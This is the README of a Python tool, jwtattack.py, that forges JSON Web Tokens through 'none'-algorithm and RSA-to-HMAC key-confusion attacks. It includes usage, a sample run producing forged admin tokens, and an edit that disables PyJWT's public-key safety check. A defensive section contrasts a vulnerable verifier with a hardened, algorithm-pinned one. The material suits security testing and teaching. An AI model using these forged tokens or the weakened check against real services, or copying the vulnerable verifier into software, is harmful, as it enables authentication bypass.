Create malicious jwt tokens
Simon Moser a99f872d45 Update 'README.md' 3 years ago
.gitignore Add jwtattack to git 3 years ago
README.md Update 'README.md' 3 years ago
jwtattack.py Add jwtattack to git 3 years ago
logger.py Add jwtattack to git 3 years ago

jwtattack.py

Requirements

  • Python3
  • PyJWT 0.4.3: pip install pyjwt==0.4.3

Later PyJWT versions refuse to use key material that looks like a public key (PEM blocks or an ssh-rsa line) for symmetric (HMAC) signatures, which is exactly what the RSA attack below relies on.

Alternative: replace

invalid_strings = [
    b'-----BEGIN PUBLIC KEY-----',
    b'-----BEGIN CERTIFICATE-----',
    b'-----BEGIN RSA PUBLIC KEY-----',
    b'ssh-rsa'
]

in algorithms.py with

invalid_strings = []

Usage

$ ./jwtattack.py -h
usage: jwtattack.py [-h] [-V] [-v] [-a] [-n] [-r] [-H HEADERS [HEADERS ...]]
                    [-D DATA [DATA ...]]
                    token [PUBLIC_KEY]

This script tries to create malicious JSON Web Tokens

positional arguments:
  token                 the JWT to attack

optional arguments:
  -h, --help            show this help message and exit
  -V, --version         show program's version number and exit
  -v, --verbose         display verbose output

Attack options:
  Select attack options to generate malicious tokens

  -a, --all             generate all possible malicious tokens
  -n, --none            generate a token using the 'none' algorithm
  -r, --rsa             generate a token signed with the public key
  PUBLIC_KEY            public key for the RSA attack (alternatively stdin)
  -H HEADERS [HEADERS ...], --headers HEADERS [HEADERS ...]
                        Changes to apply to the header, format key:value
  -D DATA [DATA ...], --data DATA [DATA ...]
                        Changes to apply to the data, format key:value

Sample output

$ echo "-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDdlatRjRjogo3WojgGHFHYLugd
UWAY9iR3fy4arWNA1KoS8kVw33cJibXr8bvwUAUparCwlvdbH6dvEOfou0/gCFQs
HUfQrSDv+MuSUMAe8jzKE4qW+jK+xQU9a03GUnKHkkle+Q0pX/g6jXZ7r1/xAK5D
o2kQ+X5xK9cipRgEKwIDAQAB
-----END PUBLIC KEY-----" | ./jwtattack.py -a eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.TCYt5XsITJX1CxPCT8yAV-TVkIEq_PbChOMqsLfRoPsnsgw5WEuts01mq-pQy7UJiN5mgRxD-WUcX16dUEMGlv50aqzpqh4Qktb3rk-BuQy72IFLOqV0G_zS245-kronKb78cPN25DGlcTwLtjPAYuNzVBAh4vGHSrQyHUdBBPM
None: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.
RSA: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.mm69FICCR3LpghwmUJDjrwcrXlqkvgbKGiLhUp-jI5U
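As an added example that is not part of this repository, a pure-Python verifier written from the defending side: verify_naive reproduces the pattern both tokens above exploit (dispatching on the alg the token itself declares, which lets the 'None' token through and turns whatever key the server holds, an RSA public key included, into an HMAC secret), and verify_pinned fixes it by letting the server, not the token, fix the algorithm. HS256 is used so it runs without a third-party library; the secret, claims and helper names are constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import json

def b64url_decode(part: str) -> bytes:
    # JWT segments are base64url without padding; restore it before decoding.
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def sign_hs256(header: dict, payload: dict, key: bytes) -> str:
    # Constructed helper: only builds the sample tokens used to exercise the verifiers.
    head = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return f"{head}.{body}.{b64url_encode(sig)}"

def verify_naive(token: str, key: bytes):
    """Vulnerable pattern: the algorithm is read from the attacker-controlled header."""
    head, body, sig = token.split(".")
    alg = json.loads(b64url_decode(head)).get("alg")
    if alg == "none":  # an unsigned token is accepted as-is
        return json.loads(b64url_decode(body))
    if alg == "HS256":  # whatever 'key' holds (even an RSA public key) becomes the HMAC secret
        expected = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(sig)):
            return json.loads(b64url_decode(body))
    return None

def verify_pinned(token: str, key: bytes, expected_alg: str = "HS256"):
    """Hardened: the server fixes the algorithm; the header must match it and 'none' never can."""
    try:
        head, body, sig = token.split(".")
        header = json.loads(b64url_decode(head))
        signature = b64url_decode(sig)
    except ValueError:  # malformed structure, base64 or JSON (JSONDecodeError is a ValueError)
        return None
    if expected_alg != "HS256" or header.get("alg") != expected_alg:
        return None  # only the pinned algorithm is implemented; anything else is rejected
    expected = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        return None
    return json.loads(b64url_decode(body))
```

In an RS256 deployment the same rule applies: the public key is handed only to an RSA verify routine and never to an HMAC, and the expected algorithm is configured on the server rather than read from the token.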